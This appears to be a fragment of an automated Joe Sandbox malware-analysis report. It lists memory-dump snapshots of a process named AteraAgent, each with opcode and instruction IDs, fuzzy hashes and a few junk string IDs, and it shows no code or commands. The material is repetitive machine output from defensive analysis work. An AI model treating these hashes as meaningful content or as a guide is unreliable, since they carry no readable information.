                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aef6da0376665d75e3782846523d02a43b1b20f906258a4dd7ac6f38d1ac29ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35212631949A59CFDB48DFA4D810AFEB7B5FB46300F0546AAE00ED72A2CB346854CB90
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 017d4072e7df92a0c8fc3c5d4effe5d65810d4aa58e0eda086ef254871b0b0fd
                                                                                                                                                                                                                                                                            • Instruction ID: 12b3f8927335860640e36a4db5f0d94c98781e187f25ab6ee81fabddc9f8663e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 017d4072e7df92a0c8fc3c5d4effe5d65810d4aa58e0eda086ef254871b0b0fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7212870D09A0DDFDB85DBA4D455AECB7B1FF5A300F5041B9E00ED72A1CA389885CB41
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1749fd90887dfab5b0a9402a8fbf8fcb50cf9776ed7e68ee464dc67bde7ebd5f
                                                                                                                                                                                                                                                                            • Instruction ID: 4751fd3d8ca8aa409ca346fe85572a6cb04b8150e19f2f864254978030fe464f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1749fd90887dfab5b0a9402a8fbf8fcb50cf9776ed7e68ee464dc67bde7ebd5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4312B3090966D8FDBA9DB28C855BE8B7F1EF59341F1001E9D04EE72A1CA785E85CF40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e38bd2263285084f422309aefe628810054bea69445ff35c0eba1e2bc43d7d32
                                                                                                                                                                                                                                                                            • Instruction ID: 18c2adc8ccb812165e6c00b5b987fa53aefd8a2a42376136a2867c4aa7a6352a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e38bd2263285084f422309aefe628810054bea69445ff35c0eba1e2bc43d7d32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B3128B0D0A6299FEBA6DB6488457E9B7F0AF19340F4442E9D04DD32A2DA785EC5CF40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 62b58f5906f5404aa8a97bf8517ec8f1a8ccd969128b41e3e6ae81d7286cd59b
                                                                                                                                                                                                                                                                            • Instruction ID: 89bc7eab7d9a49d5eb406dd5fac381bbdb0371b5a66396b627c8b74357b942c0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62b58f5906f5404aa8a97bf8517ec8f1a8ccd969128b41e3e6ae81d7286cd59b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F11E7A150FA828FE71A9BB484292A97FE1AF02254F4945BFC059872F3DA6C5D48C781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 50aaeaeae9a102bf78f4a7ffc080e4e7a48ba4700691e3abdbdd57f39b848abf
                                                                                                                                                                                                                                                                            • Instruction ID: 1eac23cef024acd6226e77e8de1b902a189d26ae994af1edd266c620a1305d96
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50aaeaeae9a102bf78f4a7ffc080e4e7a48ba4700691e3abdbdd57f39b848abf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4711C666949AC99BEB50FF6CD8951F97BA0FF86204F0506BAE04C8A0A3DD295C5982C1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f4f0d37104ef1100130471ac947b2d5a62a7d9e2409d4df52abc7d8e4c246053
                                                                                                                                                                                                                                                                            • Instruction ID: 25d6a845e5237d3ae74cc1448aeb6cb337022b4b5858afb002f60532dfe9aa59
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4f0d37104ef1100130471ac947b2d5a62a7d9e2409d4df52abc7d8e4c246053
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9911937180EF8D9FEB85DB74D415AE8BFB1EF46340F4441BAE048D71A2CE685849C751
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e42c31ab14e89837fd333a3f104c46dbeb779b11ab4bea82c437a070be2c2ae0
                                                                                                                                                                                                                                                                            • Instruction ID: 823ea6375b23f56e0f5de1365be1613b66a4b9f54c70a29db6f602642646b434
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e42c31ab14e89837fd333a3f104c46dbeb779b11ab4bea82c437a070be2c2ae0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC01D661E45B4E9FE740EBA8A8159FDB7F4EF81261B8002BAD01CD7291DE6C1C868751
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 98a69a535aab986504c0c28ea806a809f1ad8586f256f872d2a4f875ee8becd9
                                                                                                                                                                                                                                                                            • Instruction ID: c693c13e65d8c5722696bd39fdfddf942cd2165de479b4e2dfe52b08730be98a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98a69a535aab986504c0c28ea806a809f1ad8586f256f872d2a4f875ee8becd9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E113A35A09A49CFDB84EF68D885AE9B3A1FF85300F5185B9E00CCB296CE35AC45CB40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8396eab8468e3f5841772015198c93de8276f0c0dacfab42a53e6bef540a0d9f
                                                                                                                                                                                                                                                                            • Instruction ID: 1950d8a7e353f4ad96c7917a936da2a443427a45f271c932360c27a21e933ea8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8396eab8468e3f5841772015198c93de8276f0c0dacfab42a53e6bef540a0d9f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B11C672D0DA4D9FDB01DBA4D4156EDBBB4FF46310F0046BAD00ED7193DA6C55498B81
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23c775b366ad3ec4fd44130f254a610b0b81483a8c1dde36c44658ba0f05c84e
                                                                                                                                                                                                                                                                            • Instruction ID: 2d3feddacc918778db67f5ca7b7b5f2f0975be380f38f2be1c90e28b0b70649e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23c775b366ad3ec4fd44130f254a610b0b81483a8c1dde36c44658ba0f05c84e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0110770C09A2A8FEBA5DB1488457E9B7F1EB55350F1082E9D04D97261DA785EC98B80
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b088bac30e2b732aaaf343d1474955025f265457d3674c4de0df76607b9e776b
                                                                                                                                                                                                                                                                            • Instruction ID: 74bf97e74fd500d0050b237466881902dfca8779de0ba010bd05ab1e8eae3667
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b088bac30e2b732aaaf343d1474955025f265457d3674c4de0df76607b9e776b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701D67144EB4A8FE36AE774D4152EA77E1EF41321F4105BFC009EB2E1DA7D5D448A41
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9605e542a5abaf142dd1f0e21ae90a798f0cac537ed01d05535cee914eaa884a
                                                                                                                                                                                                                                                                            • Instruction ID: 3be3fd52bedff68e263300220d6a706752e12d40c2c81e29d269105a81e99320
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9605e542a5abaf142dd1f0e21ae90a798f0cac537ed01d05535cee914eaa884a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9001617490AA19DFEBA2DB748845698BBF4FF09350F1441E9D40DD3162DA3C5E868F40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 492973b82d3f37aa9216ae41d0f2fe2f93aef6b7d88243c069b60d01e62a5e0e
                                                                                                                                                                                                                                                                            • Instruction ID: 3cacdb344e8df1a243d7d337e7942ebb3259e7e41fe3b6854f933783f1fb7acf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 492973b82d3f37aa9216ae41d0f2fe2f93aef6b7d88243c069b60d01e62a5e0e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D11B6B0D09A298FEBA1DB248845BD9B7F0AF19340F4082EAD04DE3251DA785EC5CF40
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44e8aa96fcf3e7917d0ec815d3aac29df1b0dceb3b2fc4b52d5ff56929aaad4c
                                                                                                                                                                                                                                                                            • Instruction ID: 0d821eea463630428ecb8f577cefbf6d3c4c233dbe3478e910278178614dcd7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44e8aa96fcf3e7917d0ec815d3aac29df1b0dceb3b2fc4b52d5ff56929aaad4c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01463090A6298FEB69DB60C4943E8B6B1BF06300F0005FED00EA72A2CB795D88CF00
Memory Dump Source
• Source File: 0000000D.00000002.1538956575.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffaab450000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0W=$0W=$/3$/3$/3$/3$/3$/3$/3
                                                                                                                                                                                                                                                                            • API String ID: 0-1092848730
                                                                                                                                                                                                                                                                            • Opcode ID: 8a7a573ef412d15ecf50b67c1a50ac1c151067b072a30ce29e4da2b36f1865f7
                                                                                                                                                                                                                                                                            • Instruction ID: be2d7d4a78a7a7bab3a2559794afc70b6321e0b40dcda0211864822b76b20aa1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a7a573ef412d15ecf50b67c1a50ac1c151067b072a30ce29e4da2b36f1865f7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B036C70909619CFDB99EF28C494BA8B7B1FF5A344F2041F9D00DD72A2CA35AA85CF51
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$63$63$63$63$63$8h5$8h5$\
                                                                                                                                                                                                                                                                            • API String ID: 0-2537858528
                                                                                                                                                                                                                                                                            • Opcode ID: f7b0434ae31584b3eba77b33d426429243f8d82175e0bcb2a7e705d1b449432e
                                                                                                                                                                                                                                                                            • Instruction ID: e32a239c6492f6fecd6f15a3c2784b7e8894a08f807bc20f03f44b6d2722f82a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7b0434ae31584b3eba77b33d426429243f8d82175e0bcb2a7e705d1b449432e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9D25831A1DA498FF799DB6C845567877E2EF96340F1481BED09EC72A3CD38A84683C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: `o=$`o=$`o=$`o=$|P_H
                                                                                                                                                                                                                                                                            • API String ID: 0-751382402
                                                                                                                                                                                                                                                                            • Opcode ID: e6c02689b9e5034df8f15207e5379186ec08c799a80fea5f6a42d02853c622a8
                                                                                                                                                                                                                                                                            • Instruction ID: b47961f19a6ec74962d8d395e2ea723294a96b4091cd9c13b619449ec588040c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6c02689b9e5034df8f15207e5379186ec08c799a80fea5f6a42d02853c622a8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1942F77280E7C69FE3A68B2484556A53BE1EF97350F0945FDC48D8B1B3DA28684EC7C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 63$63$63
                                                                                                                                                                                                                                                                            • API String ID: 0-1694104320
                                                                                                                                                                                                                                                                            • Opcode ID: 766ac9cdfe5d85d6e8bfe02a6ef817258864f70699cae47a483f7fba0bc95022
                                                                                                                                                                                                                                                                            • Instruction ID: f6491eba25fcfea8969c9a0ed624b5a6f9208b9a68c8a90754dd1dd5bfc094c7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 766ac9cdfe5d85d6e8bfe02a6ef817258864f70699cae47a483f7fba0bc95022
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7972B33161DA498FEB98EF1CC855AB93BE2FF99344F0441B9E44DD72A2CE24EC458781
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0D=$0D=$`m=
                                                                                                                                                                                                                                                                            • API String ID: 0-2166694842
                                                                                                                                                                                                                                                                            • Opcode ID: 50a340d0f3aef90970db4b5e3b1528ee62db11865d60cce30c0ae50078254ca9
                                                                                                                                                                                                                                                                            • Instruction ID: f2a875eef9e4b2c6d41641355172801435906a5ff25bc224746e38dce87ad3f6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50a340d0f3aef90970db4b5e3b1528ee62db11865d60cce30c0ae50078254ca9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28D1A17090A68DCFEB99DB28C4646ADBBF1EF57340F5441BAD00DDB2A2CA345C49CB91
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: /3$J_H
                                                                                                                                                                                                                                                                            • API String ID: 0-991632379
                                                                                                                                                                                                                                                                            • Opcode ID: 54dea514fccf07e9da6d4a7f344222ce33f6e0ef5eae694fa5d864ff97823582
                                                                                                                                                                                                                                                                            • Instruction ID: 3a94672f5dca0eee9fa3acb94a8ebe20c0cc883f6650c1a217e4dc6253be0afc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54dea514fccf07e9da6d4a7f344222ce33f6e0ef5eae694fa5d864ff97823582
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47123921A0EB468FE766977884552797BE1FF47380F15C1BAD09EC71E3CD28684A83D2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c9f1fba6451ea6e63e0fce669d2f2a9cd5ea3b1c416af6287980f82304e9058c
                                                                                                                                                                                                                                                                            • Instruction ID: 21736b042a57a9fa122737738d3daf146d3040562aec93ebf92183a0e34ef767
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f1fba6451ea6e63e0fce669d2f2a9cd5ea3b1c416af6287980f82304e9058c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11C1A17161DE4D8FDF94EF2CC445AAA3BE1FF69351B04417AE40DD32A2CA24E855C781
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            • Instruction ID: c3589171caf97fbc2a8430efe9fb4e52334bff24f593c15889af24dfd58978c6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82cb5618063f25420a4c9d10fe0a8dc757f9aa765d6d60a2dd18cb4b4abcbd2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D913671A1DB4A8FD768DF28C4855B677E0FF96350B14867ED08EC3196DE28E886C780
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 0X=$:
                                                                                                                                                                                                                                                                            • API String ID: 0-2276393443
                                                                                                                                                                                                                                                                            • Opcode ID: 8acc9780386177f0d3aca649e9d402160aa7af0eb859f2e61558dbf8a5022f53
                                                                                                                                                                                                                                                                            • Instruction ID: ebdff3f92bb00b2848fb7d75e4e7af75ddcb80ab094566eb407f5d15c4021e53
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8acc9780386177f0d3aca649e9d402160aa7af0eb859f2e61558dbf8a5022f53
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9410517B095965FD745B7BDE8595F83BE0DF8A2A5B0940F7E48CCB0A3DC08988A83D1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: X`=$vL_^
                                                                                                                                                                                                                                                                            • API String ID: 0-2746678633
                                                                                                                                                                                                                                                                            • Opcode ID: 8b876024aac51eed4da0de8ab3b6d7bc26a655a8da00973e126d5f51a74d5aab
                                                                                                                                                                                                                                                                            • Instruction ID: 34d770b243d7fe39a561befff24f0a33e82b295df0849b376afeb86156d90615
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b876024aac51eed4da0de8ab3b6d7bc26a655a8da00973e126d5f51a74d5aab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A410671B1DA489FE758DB6CE82A5797BE1EF9A391B0441BBE04DC72A3CD205C0687C1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
